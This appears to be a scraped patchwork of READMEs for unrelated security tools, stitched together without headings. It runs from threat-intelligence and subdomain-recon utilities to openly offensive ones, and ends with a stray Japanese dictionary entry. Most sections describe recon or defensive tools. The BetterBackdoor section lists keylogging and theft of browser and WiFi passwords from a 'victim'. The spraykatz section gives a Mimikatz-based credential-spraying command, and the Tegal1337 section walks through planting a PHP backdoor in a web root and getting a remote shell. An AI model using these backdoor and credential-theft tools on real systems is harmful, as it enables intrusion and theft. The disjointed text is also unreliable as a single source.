• Server-client architecture. Investigation may be shared among your team.
• APIkeys are stored in a database and may be shared by a team from a single point.
• Results are cached; so not repeated API calls are used.
• Better feeds your Threat Intelligence Platform. TheTHE allows to better perform a prior investigation of your assets.
• Easy plugins: Whatever you need, it is easily embedded within the system.
• Ideal for SOCs, CERTS or any team.
• Automation of tasks and searches.
• Rapid API processing of multiple tools.
• Unification of information in a single interface, so that screenshots, spreadsheets, text files, etc. are not scattered.
• Enrichment of collected data.
• Periodic monitoring of a given IOC in case new information or related movements appear.

• git clone ...

• pip install venv
• python3 -m venv venv

• docker-compose build

• cd frontend and npm install

source venv/bin/activate

watchmedo auto-restart -d tasks -p '*.py' -- celery -A tasks.tasks:celery_app worker -l info

gunicorn server.main:app --reload

cd frontend
npm run serve

docker exec -it thethe_mongo_1 /bin/bash

mongo -u MONGO_INITDB_ROOT_USERNAME -p MONGO_INITDB_ROOT_PASSWORD

use thethe

db.users.insert_one({"name": YOUR_NAME, "password": HASH})

from passlib.apps import custom_app_context as pwd_context
pwd_context.encrypt("yourpassword")

RESOURCE_TARGET = [ResourceType.IPv4]

# Plugin Metadata {a decription, if target is actively reached and name}
PLUGIN_DESCRIPTION = "Use a GeoIP service to geolocate an IP address"
PLUGIN_IS_ACTIVE = False
PLUGIN_NAME = "geoip"


class Plugin:
    description = PLUGIN_DESCRIPTION
    is_active = PLUGIN_IS_ACTIVE
    name = PLUGIN_NAME

    def __init__(self, resource, project_id):
        self.project_id = project_id
        self.resource = resource

    def do(self):
        resource_type = self.resource.get_type()

        try:
            to_task = {
                "ip": self.resource.get_data()["address"],
                "resource_id": self.resource.get_id_as_string(),
                "project_id": self.project_id,
                "resource_type": resource_type.value,
                "plugin_name": Plugin.name,
            }
            geoip_task.delay(**to_task)

        except Exception as e:
            tb1 = traceback.TracebackException.from_exception(e)
            print("".join(tb1.format()))

@celery_app.task
def geoip_task(plugin_name, project_id, resource_id, resource_type, ip):
    try:
        query_result = geoip(ip)
        if not query_result:
            return

        # TODO: See if ResourceType.__str__ can be use for serialization
        resource_type = ResourceType(resource_type)
        resource = Resources.get(resource_id, resource_type)
        resource.set_plugin_results(
            plugin_name, project_id, resource_id, resource_type, query_result
        )

    except Exception as e:
        tb1 = traceback.TracebackException.from_exception(e)
        print("".join(tb1.format()))

def geoip(ip):
    try:
        URL = f"http://api.ipstack.com/{ip}?access_key={API_KEY}&format=1"
        response = urllib.request.urlopen(URL).read()
        return json.loads(response)

    except Exception as e:
        tb1 = traceback.TracebackException.from_exception(e)
        print("".join(tb1.format()))
        return None

<template>
<v-layout row pt-2 wrap class="subheading">
<v-flex lg5>
<v-flex>
<v-card>
<v-card-title primary-title>
<span class="subheading">Geolocalization</span>
</v-card-title>
<v-divider></v-divider>
<v-card-text>
<v-layout row>
<v-flex lg-6 class="text-xs-left">
<v-layout column>
<v-flex>
<v-label>Continent:</v-label>
</v-flex>
<v-flex>
<v-label>Country:</v-label>
</v-flex>
<v-flex>
<v-label>Region:</v-label>
</v-flex>
<v   -flex>
<v-label>City:</v-label>
</v-flex>
<v-flex>
<v-label>Zip:</v-label>
</v-flex>
<v-flex>
<v-label>Latitude:</v-label>
</v-flex>
<v-flex>
<v-label>Longitude:</v-label>
</v-flex>
<v-flex v-if="resource.country_code">
<v-label>Flag:</v-label>
</v-flex>
</v-layout>
</v-flex>
<v-flex lg-6 class="text-xs-right">
<v-layout column>
<v-flex>{{ resource.continent_name }}</v-flex>
<v-flex>{{ resource.co   untry_name }}</v-flex>
<v-flex>{{ resource.region_name }}</v-flex>
<v-flex>{{ resource.city }}</v-flex>
<v-flex>{{ resource.zip }}</v-flex>
<v-flex>{{ resource.latitude }}</v-flex>
<v-flex>{{ resource.longitude }}</v-flex>
<v-flex v-if="resource.country_code">
<country-flag :country="resource.country_code"></country-flag>
</v-flex>
</v-layout>
</v-flex>
</v-layout>
</v-card-text>
</v-card>
</v-flex>
</v-flex>
</v-layout>
</template>

<script>
import { make_unique_list } from "../../../utils/utils";

export default {
  name: "geoip"   ,
  props: {
    plugin_results: Object
  },
  data: function() {
    return {};
  },
  computed: {
    resource: function() {
      let plugin_result = { ...this.plugin_results };
      return plugin_result;
    }
  }
};
</script>

• Extracting Protobuf structures from programs, converting them back into readable .protos, supporting various implementations:
  
  • All the main Java runtimes (base, Lite, Nano, Micro, J2ME), with full Proguard support,
  • Binaries containing embedded reflection metadata (typically C++, sometimes Java and most other bindings),
  • Web applications using the JsProtoUrl runtime.
• Editing, replaying and fuzzing data sent to Protobuf network endpoints, through a handy graphical interface that allows you to edit live the fields for a Protobuf message and view the result. 

$ yaourt -S pbtk-git
$ pbtk

# For Ubuntu/Debian testing derivates:
$ sudo apt install python3-pip git openjdk-9-jre

$ sudo pip3 install protobuf pyqt5 requests websocket-client

$ git clone https://github.com/marin-m/pbtk
$ cd pbtk
$ ./gui.py

./gui.py

./extractors/jar_extract.py [-h] input_file [output_dir]
./extractors/from_binary.py [-h] input_file [output_dir]
./extractors/web_extract.py [-h] input_url [output_dir]

[{
    "request": {
        "transport": "pburl",
        "proto": "www.google.com/VectorTown.proto",
        "url": "https://www.google.com/VectorTown",
        "pb_param": "pb",
        "samples": [{
            "pb": "!....",
            "hl": "fr"
        }]
    },
    "response": {
        "format": "other"
    }
}]

• An extractor supports extracting .proto structures from a target Protobuf implementation or platform.

@register_extractor(name = 'my_extractor',
                    desc = 'Extract Protobuf structures from Foobar code (*.foo, *.bar)',
                    depends={'binaries': ['foobar-decompiler']})
def my_extractor(path):
    # Load contents of the `path` input file and do your stuff...

    # Then, yield extracted .protos using a generator:
    for i in do_your_extraction_work():
        yield proto_name + '.proto', proto_contents

    # Other kinds of information can be yield, such as endpoint information or progress to display.

• A transport supports a way of deserializing, reserializing and sending Protobuf data over the network. For example, the most commonly used transport is raw POST data over HTTP.

@register_transport(
    name = 'my_transport',
    desc = 'Protobuf as raw POST data',
    ui_data_form = 'hex strings'
)
class MyTransport():
    def __init__(self, pb_param, url):
        self.url = url

    def serialize_sample(self, sample):
        # We got a sample of input data from the user.
        # Verify that it is valid in the form described through "ui_data_form" parameter, fail with an exception or return False otherwise.
        # Optionally modify this data prior to returning it.
        bytes.fromhex(sample)
        return sample

    def load_sample(self, sample, pb_msg):
        # Parse input data into the provided Protobuf object.
        pb_msg.ParseFromString(bytes.fromhex(sample))

    def perform_request(self, pb_data, tab_data):
        # Perform a request using the provided URL and Protobuf object, and optionally other transport-specific side dat   a.
        return post(url, pb_data.SerializeToString(), headers=USER_AGENT)

• Reconcobra is Foot printing software for Ultimate Information Gathering
• Kali, Parrot OS, Black Arch, Termux, Android Led TV

• Software have 82 Options with full automation with powerful information gathering capability

• ReconCobra is useful in Banks, Private Organisations and Ethical hacker personnel for legal auditing.
• It serves as a defense method to find as much as information possible for gaining unauthorised access and intrusion.
• With the emergence of more advanced technology, cybercriminals have also found more ways to get into the system of many organizations.
• ReconCobra software can audit, firewall behaviour, if it is leaking backend machines/server and replying pings, it can find internal and external networks where many software’s like erp, mail firewalls are installed, exposing servers so it do Footprinting, Scanning & Enumeration as much as possible of target, to discover and collect most possible informations like username, web technologies, files, endpoint, api and much more.
• It’s first step to stop cyber criminals by securing your Infrastructural Information Gathering leakage. ReconCobra is false positive free, when there is something it will show no matter what, if it is not, it will give blank results rather error.

• ReconCobra is now a part of International Hacking Trainings for OSINT
• Cybersecurity365.com OSINT for Reconnaissance trainings for CEH, CISSP, Security+, ITPA

• Tigerman Root Software Package

• https://www.youtube.com/watch?v=TupCmgzp6hg

• git clone https://github.com/haroonawanofficial/ReconCobra.git
• cd Reconcobra
• sudo chmod u+x *.sh
• ./Kali_Installer.sh
• ReconCobra will integrate as system software
• Dependencies will be handled automatically
• Third party software(s)/dependencies/modules will be handled automatically

• git clone https://github.com/haroonawanofficial/ReconCobra.git
• cd Reconcobra
• chmod u+x *.sh
• Bash ParrotOS_Installer.sh
• ReconCobra will integrate as system software
• Dependencies will be handled automatically
• Third party software(s)/dependencies/modules will be handled automatically

• git clone https://github.com/haroonawanofficial/ReconCobra.git
• cd Reconcobra
• chmod u+x *.sh
• pkg install proot
• type: termux-chroot
• ./Termux_Installer.sh
• ./Termux_fixme.sh
• Reboot your Termux
• perl ReconCobraTermux.pl
• Dependencies will be handled automatically for Termux
• Third party software(s)/dependencies/modules will be handled automatically for Termux

• Install termux
• Input usb keyboard
• git clone https://github.com/haroonawanofficial/ReconCobra.git
• cd Reconcobra
• chmod u+x *.sh
• pkg install proot
• type: termux-chroot
• ./Termux_Installer.sh
• ./Termux_fixme.sh
• Reboot your Termux
• perl ReconCobraTermux.pl
• Dependencies will be handled automatically for Termux
• Third party software(s)/dependencies/modules will be handled automatically for Termux

• Open issue, if error occur
• git clone https://github.com/haroonawanofficial/ReconCobra.git
• cd Reconcobra
• chmod u+x *.sh
• ./BlackArch_Installer.sh
• ReconCobra will integrate as system software
• Dependencies will be handled automatically
• Third party software(s)/dependencies/modules will be handled automatically

• Haroon Awan
• mrharoonawan@gmail.com

• Arun S

python3 -m pip install -r requirements.txt

python3 secretx.py --list urlList.txt --threads 15

optional arguments: --help  --colorless

Note: Silver isn't compatible with Python 2.

• Resumable scanning
• Slack notifcations
• multi-core utilization
• Vulnerability data caching
• Smart Shodan integration*

• nmap
• masscan

Note: Silver scans all TCP ports by default i.e. ports 0-65535.

python3 silver.py 127.0.0.1
python3 silver.py 127.0.0.1/22
python3 silver.py 127.0.0.1,127.0.0.2,127.0.0.3

python3 silver.py 127.0.0.1 --quick

python3 silver.py -i /path/to/targets.txt

python3 silver.py -i /path/to/targets.txt -t 4

• Create a workspace on slack, here
• Create an app, here
• Enable WebHooks from the app and copy the URL from there to Silver's /core/memory.py file.

• Java 8 or higher
• Gradle

• Check out the code from GitHub and run 'gradle build'
• You may find the executable jar under the build/libs folder
• Run 'java -jar imperva-api-attack-tool.jar' to see the help menu

• Copy the runnable.sh file from the src/main/resources folder, to the same directory with the jar file.
• Now run: 'cat runnable.sh imperva-api-attack-tool.jar > api-attack.sh && chmod +x api-attack.sh'
• You may use the api-attack.sh file as a regular executable

The API specification file (swagger 2.0) to run on. JSON/YAML format. For better results, make sure responses are well defined for each endpoint.

The host name to connect to. It can also be an IP

Connection to host will be made using this scheme; e.g: https or http

The port the host is listening on for API calls, default is: 443

Specify the proxy host to send the requests via a proxy

The proxy port, default is: 80

Additional response codes to be accepted in negative attacks (e.g. bad value attacks). Multiple values are supported, separated by commas

Additional response codes to be accepted in positive checks (legitimate value attacks). Multiple values are supported, separated by commas

• You'd like to check whether your API is protected by an API Security solution.
  Example run: api-attack.sh -f swaggerPetStore.json -n myapisite.com -s http -rcn=403
  We've added the 403 response code as a legitimate response code for the negative checks. This is since the API Security solution blocks such requests, and returns a 403 status. The spec, on the other hand, doesn't necessarily define such a response with HTTP code of 403, for any of its endpoints. This would make such responses legitimate, in spite of them not being in the spec, and alert you when such a response is not received from a negative check. Such cases mean that you are left unprotected by your API security solution.
  
• You'd like to check how your proxy mitigates API attacks, but don't have an actual site behind it.
  Example run: api-attack.sh -f swaggerPetStore.json -n myapisite.com -s http -ph 127.0.0.1 -pp=4010 -rcn=403 -rcp=404
  This time we've added the 404 status code to the positive scenarios. So that when a scenario is not being blocked, we will not report a failure, but rather accept the legitimate 404 (resource not found) response.
  
• You'd like to check whether your API handles all inputs correctly. Furthermore, you'd like to run it on a nightly basis, or even after each time a developer pushes new code to the project.
  Example run: api-attack.sh -f myapi_swagger.yaml -n staging.myorg.com -s https
  This time we're running without any exclusions. The API specification file must declare its response codes precisely. The tool will accept only them as legitimate, and will fail the checks otherwise. See more below on conditions of failing the checks. Run the above command in a Jenkins job (or any other CI/CD software to your liking), which will be triggered by a cron, or a repo code push activity. Make sure you have the TestNG plugin installed, which should parse the results written in build/testng-results, for better visibility in the CI/CD scenario.
  
• You'd like to check whether this API might be open to fuzzing attempts. Simply run the tool and check the reported failures.
  Example run: api-attack.sh -f publiclyAvailableSwaggerOfAPI.yaml -n api.corporate.com -s https
  
• You'd like to check whether your API is implemented correctly on the server side, or that its definition corresponds the server implementation.
  Example run: api-attack.sh -f publiclyAvailableSwaggerOfAPI.yaml -n api.corporate.com -s https
  

• The tool verifies the generated request response code matches the declared response codes in the swagger. Yet,
• Positive checks: if it's a clear error (code is 5xx), we will still fail the check, even if this response code is not defined in the spec, but not if you supplied an override.
• Negative checks: if the response is not a legitimate error (1xx, 2xx, 5xx), we fail the check unless you supplied an override. If the legitimate error code is not in the spec, the check will fail as well.
• You may use the 'default' definition in the response section of the swagger, but this is not recommended. Always define your legitimate answers precisely.

• The tool verifies the generated request response code matches the declared response codes in the swagger. Yet,
• Positive checks: if it's a clear error (code is 5xx), we will still fail the check, even if this response code is not defined in the spec, but not if you supplied an override.
• Negative checks: if the response is not a legitimate error (1xx, 2xx, 5xx), we fail the check. Unless you supplied an override. If the legitimate error code is not in the spec, the check will fail as well.
• You may use the 'default' definition in the response section of the swagger, but this is not recommended. Always define your legitimate answers precisely.

• The tool uses the testng reporting framework, so any plugin that handles testng runs can be used here. Only note that the results are written under the build/testng-results folder. This can be changed, of course.
• The tool generates requests according to its check suites, and each request checks something specific. So each check will present all the relevant details in the command line output, together with what is being checked, what the response is, and whether or not it was as expected.
• Any bad requests will be stored in the bad_requests folder, so that you could analyze it later (e.g. if this is running on CI/CD server, for instance, and you don't have immediate access to the machine)
• In the end, you will be provided with a summary

***** Testing API Endpoint *****
***** Test ID: 1575128763286-74212
Testing: Bad Property: /username (STRING), value: {, URL encoded: %7B
--> Url: /user/{
--> Method: GET
--> Headers: []
----------**----------
Request was: GET /user/{ [Accept: application/json], Response status code: 200(UNEXPECTED)
Response (non parsed):
{"id":0,"username":"string","firstName":"string","lastName":"string","email":"string","password":"string","phone":"string","userStatus":0}

***** Testing API Endpoint *****
***** Test ID: 1575128763286-25078
Testing: Bad Property: /body/quantity (INTEGER), value: 0.4188493, URL encoded: 0.4188493
--> Url: /store/order
--> Method: POST
--> Headers: []
--> Body: {"petId":-2511515111206893939,"quantity":0.4188493,"id":698757161286106823,"shipDate":"�s","complete":"true","status":"approved"}
----------**----------
Request was: POST /store/order [Accept: application/json], Response status code: 200(UNEXPECTED)
Response (non parsed):
{"id":0,"petId":0,"quantity":0,"shipDate":"2019-11-30T15:46:03Z","status":"placed","complete":false}

***** Testing API Endpoint *****
***** Test ID: 1575128763137-43035
Testing: /user/{username}
--> Url: /user/%E68E97EDB4Oq-(!BbG,Y$p'A-KW%65f9FA6jt5vvDz-cW.QGsLS+AA~RIHC3wgy25lDJsGzcT.;kJ+(
--> Method: GET
--> Headers: []
----------**----------
Request was: GET /user/%E68E97EDB4Oq-(!BbG,Y$p'A-KW%65f9FA6jt5vvDz-cW.QGsLS+AA~RIHC3wgy25lDJsGzcT.;kJ+( [Accept: application/json], Response status code: 404
Response (non parsed):
{"statusCode":404,"error":"Not Found","message":"Not Found"}

• For each endpoint, creates a request with generated values for all of its parameters. These are generated randomly, but obey the rules that are defined in the API specification.
• For each endpoint, creates a request with only the required parameters, with values generated as described above.

• For each endpoint, creates multiple requests, each which checks a different parameter. The tool does this by injecting a random bad input value in the checked parameter, and filling the rest with "positive" values which are generated in the same manner as described in the positive scenarios.

• Audit every call to filesystem related libc functions performed by the binary.
• Check if the path used in the syscall is user-writable. In this case an unprivileged user could have replaced a directory or file with a symlink.
• Log all violations as potential vulnerabilities.

if (S_ISDIR (sb.st_mode)) {
    char *dst;

    if ((dst = malloc(strlen(ent->d_name) + 3)) == NULL)
        message (LOG_FATAL, "malloc failed.\n");
    strcpy(dst, ent->d_name);
    strcat(dst, "/X");
    rename(ent->d_name, dst);
    if (errno == EXDEV) {
        free(dst);
        message (LOG_VERBOSE,
                 "File on different device skipped: `%s/%s'\n",
                 dirname, ent->d_name);
        continue;
    }
    // [...]

1. The kernel traverses the path "/tmp/foo" for the first argument.
2. The kernel traverses the path "/tmp/foo/x" for the second argument.
3. If the source and target are on different filesystems, return EXDEV.
4. Otherwise, move the file from the first to the second directory.

bazel build //pathauditor/libc:libpath_auditor.so
LD_PRELOAD=/path/to/bazel-bin/pathauditor/libc/libpath_auditor.so cat /tmp/foo/bar
tail /var/log/syslog

docker build -t pathauditor-example .
docker run -it pathauditor-example
# LD_PRELOAD=/pathauditor/bazel-bin/pathauditor/libc/libpath_auditor.so cat /tmp/foo/bar
# cat /var/log/syslog

• Create a dated folder with recon notes
  
• Grab subdomains using:
  

  * Sublist3r, certspotter and cert.sh
  * Dns bruteforcing using massdns

• Find any CNAME records pointing to unused cloud services like aws
  
• Probe for live hosts over ports 80/443
  
• Grab a screenshots of responsive hosts
  
• Scrape wayback for data:
  

  * Extract javascript files
  * Build custom parameter wordlist, ready to be loaded later into Burp intruder or any other tool
  * Extract any urls with .jsp, .php or .aspx and store them for further inspection

• Perform nmap on specific ports
  
• Get dns information about every subdomain
  
• Perform dirsearch for all subdomains
  
• Generate a HTML report with output from the tools above
  
• Improved reporting and less output while doing the work
  
• Dark mode for html reports
  

• Directory search module is now MULTITHREADED (up to 10 subdomains scanned at a time)
• Enhanced html reports with the ability to search for strings, endpoints, reponse sizes or status codes

• Download the install script from https://github.com/nahamsec/bbht.
• Go version 1.10 or later.

• Recommended to run on vps with 1VCPU and 2GB ram.

• Tom Hudson - Tomonomnom
• Ahmed Aboul-Ela - Aboul3la
• B. Blechschmidt - Blechschmidt
• Thomas D. - Maaaaz
• Daniel Miessler - Danielmiessler

• Report only mode to generate reports for old dirsearch data
• SubDomain exclusion

Host: KVM/QEMU (Standard PC (i440FX + PIIX, 1996) pc-i440fx-3.1)
Kernel: 5.2.6-arch1-1-ARCH
CPU: Intel (Skylake, IBRS) (4) @ 2.904GHz
Memory: 139MiB / 3943MiB

• Subdomains monitoring: put data to Discord, Slack or Telegram webhooks. See Subdomains Monitoring for more information.
• Multi-thread support for API querying, it makes that the maximun time that Findomain will take to search subdomains for any target is 20 seconds.
• Parallel support for subdomains resolution, in good network conditions can resolv about 2000 subdomains per minute.
• DNS over TLS support.
• Specific IPv4 or IPv6 query support.
• Discover subdomains without brute-force, it tool uses Certificate Transparency Logs and APIs.
• Discover only resolved subdomains.
• Discover subdomains IP for data analisis.
• Read target from user argument (-t) or file (-f).
• Write to one unique output file specified by the user all or only resolved subdomains.
• Write results to automatically named TXT output file(s).
• Hability to query directly the Findomain database created with Subdomains Monitoring for previous discovered subdomains.
• Hability to import and work data discovered by other tools.
• Quiet mode to run it silently.
• Cross platform support: Any platform, it's written in Rust and Rust is multiplatform. See the documentation for instructions.
• Multiple API support.

• Certspotter
• Crt.sh
• Virustotal
• Sublist3r
• Facebook**
• Spyse (CertDB)*
• Bufferover
• Threadcrow
• Virustotal with apikey**

$ git clone https://github.com/Edu4rdSHL/findomain.git -b develop # Only the develop branch is needed
$ cd findomain
$ cargo build --release
$ ./target/release/findomain

$ git pull
$ cargo build --release
$ ./target/release/findomain

• Linux
• Windows
• MacOS
• Aarch64 (Raspberry Pi)

1. cargo install findomain
2. Execute the tool from $HOME/.cargo/bin. See the cargo-install documentation.

1. Clone the repository or download the release source code.
2. Extract the release source code (only needed if you downloaded the compressed file).
3. Go to the folder where the source code is.
4. Execute cargo build --release
5. Now your binary is in target/release/findomain and you can use it.

$ pkg install rust make perl
$ cargo install findomain
$ cd $HOME/.cargo/bin
$ ./findomain

$ git clone https://github.com/Edu4rdSHL/findomain.git
$ cd findomain
$ cargo build --release
$ sudo cp target/release/findomain /usr/bin/
$ findomain

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux
$ chmod +x findomain-linux
$ ./findomain-linux

$ sudo pacman -S findomain

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-aarch64
$ chmod +x findomain-aarch64
$ ./findomain-aarch64

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-osx
$ chmod +x findomain-osx.dms
$ ./findomain-osx.dms

1. You downloaded a precompiled binary: If you are using a precompiled binary, then you need to download the new binary.
2. You are using it from BlackArch Linux: Just run pacman -Syu
3. You have cloned the repo and compiled it from source: You just need to go to the folder where the repo is cloned and run: git pull && cargo build --release, when finish, you have your executable in target/release/findomain.
4. You downloaded a source code release and compiled it: You need to download the new source code release and compile it again.
5. I used cargo install findomain: then just run cargo install --force findomain.

1. Open https://developers.facebook.com/apps/
2. Clic in "Create App", put the name that you want and send the information.
3. In the next screen, select "Configure" in the Webhooks option.
4. Go to "Configuration" -> "Basic" and clic on "Show" in the "App secret key" option.
5. Now open in your browser the following URL: https://graph.facebook.com/oauth/access_token?client_id=your-app-id&client_secret=your-secret-key&grant_type=client_credentials

6. You should have a JSON like:

{
  "access_token": "xxxxxxxxxx|yyyyyyyyyyyyyyyyyyyyyyy",
  "token_type": "bearer"
}

7. Save the access_token value.

$ findomain_fb_token="YourAccessToken" findomain -(options)

> set findomain_fb_token=YourAccessToken && findomain -(options)

1. Open https://account.spyse.com/register and make the registration process (include email verification).
2. Log in into your spyse account and go to https://account.spyse.com/user
3. Search for the "API token" section and clic in "Show".
4. Save that access token.

$ findomain_spyse_token="YourAccessToken" findomain -(options)

> set findomain_spyse_token=YourAccessToken && findomain -(options)

1. Open https://www.virustotal.com/gui/join-us and make the registration process (include email verification).
2. Log in into your spyse account and go to https://www.virustotal.com/gui/user/YourUsername/apikey
3. Search for the "API key" section.
4. Save that API key.

$ findomain_virustotal_token="YourAccessToken" findomain -(options)

> set findomain_virustotal_token=YourAccessToken && findomain -(options)

        --postgres-database <postgres-database>    Postgresql database.
        --postgres-host <postgres-host>            Postgresql host.
        --postgres-password <postgres-password>    Postgresql password.
        --postgres-port <postgres-port>            Postgresql port.
        --postgres-user <postgres-user>            Postgresql username.

• Discord.
• Slack.
• Telegram.

findomain_discord_webhook: Discord webhook URL.
findomain_slack_webhook: Slack webhook URL.
findomain_telegrambot_token: Telegram bot autentication token.
findomain_telegrambot_chat_id: Unique identifier for the target chat or username of the target channel.

1. If you only specify the -m flag without more arguments or don't specify one of the options Findomain sets:

• Database host: localhost
• Database username: postgres
• Database password: postgres
• Database port: 5432
• Database: Default PostgreSQL database cluster

1. Connect to local computer and local PostgreSQL server with specific username, password and database and push the data to both Discord and Slack webhooks

$ findomain_discord_webhook='https://discordapp.com/api/webhooks/XXXXXXXXXXXXXXX' findomain_slack_webhook='https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX' findomain -m -t example.com --postgres-database findomain --postgres-user findomain --postgres-host localhost --postgres-port 5432

2. Connect to remote computer/server and remote PostgreSQL server with specific username, password and database and push the data to both Discord and Slack webhooks

$ findomain_discord_webhook='https://discordapp.com/api/webhooks/XXXXXXXXXXXXXXX' findomain_slack_webhook='https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX' findomain -m -t example.com --postgres-user postgres --postgres-password psql  --postgres-host 192.168.122.130 --postgres-port 5432

3. Connect to remote computer/server and remote PostgreSQL server with specific username, password and database and push the data to Telegram webhook

$ findomain_telegrambot_token="Your_Bot_Token_Here" findomain_telegrambot_chat_id="Your_Chat_ID_Here" findomain -m -t example.com --postgres-user postgres --postgres-password psql  --postgres-host 192.168.122.130 --postgres-port 5432

4. Connect to local computer using the default values

$ findomain_discord_webhook='https://discordapp.com/api/webhooks/XXXXXXXXXXXXXXX' findomain_slack_webhook='https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX' findomain -m -t example.com

1. Make a simple search of subdomains and print the info in the screen:

2. Make a search of subdomains and print the info in the screen:

3. Make a search of subdomains and export the data to a output file (the output file name in it case is example.com.txt):

4. Make a search of subdomains and export the data to a custom output file name:

5. Make a search of only resolvable subdomains:

6. Make a search of only resolvable subdomains, exporting the data to a custom output file.

7. Search subdomains from a list of domains passed using a file (you need to put a domain in every line into the file):

8. Search subdomains from a list of domains passed using a file (you need to put a domain in every line into the file) and save all the resolved domains into a custom file name:

9. Query the Findomain database created with Subdomains Monitoring.

10. Query the Findomain database created with Subdomains Monitoring and save results to a custom filename.

11. Import subdomains from several files and work with they in the Subdomains Monitoring process:

• Requirements
  
• Linux
  

  sudo apt install tor
  sudo apt install python3-socks  (optional)
  pip3 install --user -r requirements.txt

• Windows
  download tor expert bundlepip3 install -r requirements.txt
  

• Usage
  
• Preview
  

• Linux
  

  git clone https://github.com/mIcHyAmRaNe/okadminfinder3.git
  cd okadminfinder3
  chmod +x okadminfinder.py
  python3 okadminfinder.py

• Windows
  download & extract zip
  

  cd okadminfinder3
  py -3 okadminfinder.py

• Pentestbox (same procedure as Linux)
  you can add an alias by adding this line: okadminfinder=py -3 "%pentestbox_ROOT%/bin/Path/to/okadminfinder3/okadminfinder.py" $* to C://Pentestbox/bin/customtools/customaliases file and so you'll be able to launch it using okadminfinder
  

• More than 500 potential admin panels
• Tor & Proxy
• Random-Proxy
• Random-Agents
• Console work with params, like: okadminfinder.py -u example.com --proxy 127.0.0.1:8080
• Self-Update
• Classify admin panel links by popularity
• Multithreading, for faster work
• Adding more potential admin panel pages

• Run Command Prompt commands
• Run PowerShell scripts
• Run DuckyScripts to inject keystrokes
• Exfiltrate files based on extension
• Exfiltrate Microsoft Edge and WiFi passwords
• Send and receive files to and from victim's computer
• Start a KeyLogger
• Get a screenshot of victim's computer
• Get text copied to victim's clipboard
• Get contents from a victim's file (cat)

• Creates 'run.jar', the backdoor jar file, and copied it to directory 'backdoor'.
• Appends a text file containing the server's IPv4 address to 'run.jar'.
• If desired, copies a Java Runtime Environment to 'backdoor' and creates batch file 'run.bat' for running the backdoor in the packaged Java Runtime Environment.

• A Java JDK distribution >=8 must be installed and added to PATH.
• You must use the same computer to create and control the backdoor.
  • The computer used to create the backdoor must be on the same WiFi network as the victim's computer.
  • The IPv4 address of this computer must remain static in the time between creating the backdoor and controlling it.
• The computer used to control the backdoor must have their firewall deactivated, and if the computer has a Unix OS, must run BetterBackdoor as 'sudo'.

# clone BetterBackdoor
git clone https://github.com/ThatcherDev/BetterBackdoor.git

# change the working directory to BetterBackdoor
cd BetterBackdoor

# build BetterBackdoor with Maven
# for Windows run
mvnw.cmd clean package

# for Linux run
chmod +x mvnw
./mvnw clean package

# for Mac run
sh mvnw clean package

java -jar betterbackdoor.jar

apt update
apt install -y python3.6 python3-pip git nmap
git clone --recurse-submodules https://github.com/aas-n/spraykatz.git
cd spraykatz
pip3 install -r requirements.txt

./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24

Mandatory arguments

• Mimikatz
• Impacket
• Pypykatz
• Pywerview
• Sysinternals
• hackndo

sudo pip install -r requirements.txt

python3 shell.py -g backdoor -p tegal1337
   ______      ____
  / __/ / ___ / / __ __
 _\ \/ _ / -_/ / / // /
/___/_//_\__/_/_/\_, /
                /___/  v.1
--------------------------
Python shell - Tegal1337 |
Generate :
[+] ./backdoor.py -g "nama_shell" -p "password"
Connect Server :
[+] ./backdoor.py -u "url_shell" -p "password"

Backdoor berhasil dibuat dengan nama backdoor.php dan password tegal1337

dalpan@Tegal1337:~/Tools$ mv backdoor.php /opt/lampp/htdocs/php-futsal/
dalpan@Tegal1337:~/Tools$ python3 shell.py -u "http://localhost/php-futsal/backdoor.php" -p tegal1337
/opt/lampp/htdocs/php-futsal$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

• Email : contact@dalpan.co
• FB : fb.com/dalpan.me

make install

$ cat .env
export HUSKYCI_CLIENT_REPO_URL="https://github.com/globocom/huskyCI.git"
export HUSKYCI_CLIENT_REPO_BRANCH="vulns-Golang"
export HUSKYCI_CLIENT_API_ADDR="http://localhost:8888"
export HUSKYCI_CLIENT_API_USE_HTTPS="false"
export HUSKYCI_CLIENT_TOKEN="{YOUR_TOKEN_HERE}"

. .env

make run-client

make run-client-linux

http://localhost:8080

$ git clone https://github.com/superhedgy/AttackSurfaceMapper

$ cd AttackSurfaceMapper
$ python3 -m pip install --no-cache-dir -r requirements.txt

• VirusTotal
• ShodanIO
• HunterIO
• WeLeakInfo
• LinkedIn
• GrayHatWarfare

$ nano keylist.asm

$ python3 asm.py -t your.site.com -ln -w resources/top100_sublist.txt -o demo_run

|<------ AttackSurfaceMapper - Help Page ------>|

positional arguments:
  targets               Sets the path of the target IPs file.

optional arguments:
  -h, --help            show this help message and exit
  -f FORMAT, --format FORMAT
                        Choose between CSV and TXT output file formats.
  -o OUTPUT, --output OUTPUT
                        Sets the path of the output file.
  -sc, --screen-capture
                        Capture a screen shot of any associated Web Applications.
  -sth, --stealth       Passive mode allows reconaissaince using OSINT techniques only.
  -t TARGET, --target TARGET
                        Set a single target IP.
  -V, --version         Displays the current version.
  -w WORDLIST, --wordlist WORDLIST
                        Specify a lis   t of subdomains.
  -sw SUBWORDLIST, --subwordlist SUBWORDLIST
                        Specify a list of child subdomains.
  -e, --expand          Expand the target list recursively.
  -ln, --linkedinner    Extracts emails and employees details from linkedin.
  -v, --verbose         Verbose ouput in the terminal window.

Authors: Andreas Georgiou (@superhedgy)
  Jacob Wilkin (@greenwolf)

• Andreas Georgiou
• Jacob Wilkin

pylane inject <PID> <YOUR_PYTHON_FILE>

pylane shell <PID>

• use IPython as its interactive interface, support magic functions like ? and %
• support remote automatic completion
• provide debug toolkit functions, such as:
  • lookup class or instance by name
  • get source code of an object
  • print all threads' stack and locals

pip install pylane

ぱくる (godan conjugation, hiragana and katakana パクる, rōmaji pakuru)

1. eat with a wide open mouth
2. steal when one isn't looking, snatch, swipe
3. copy someone's idea or design
4. nab, be caught by the police

Wiktionary:ぱくる

• November 2nd,2019: AV TOKYO 2018 Hive

• Intelligence gathering.
• Vulnerability analysis.
• Visualize.
• Brute Force Attack.
• Exploitation.

• Scan
  • Nmap
  • AutoRecon
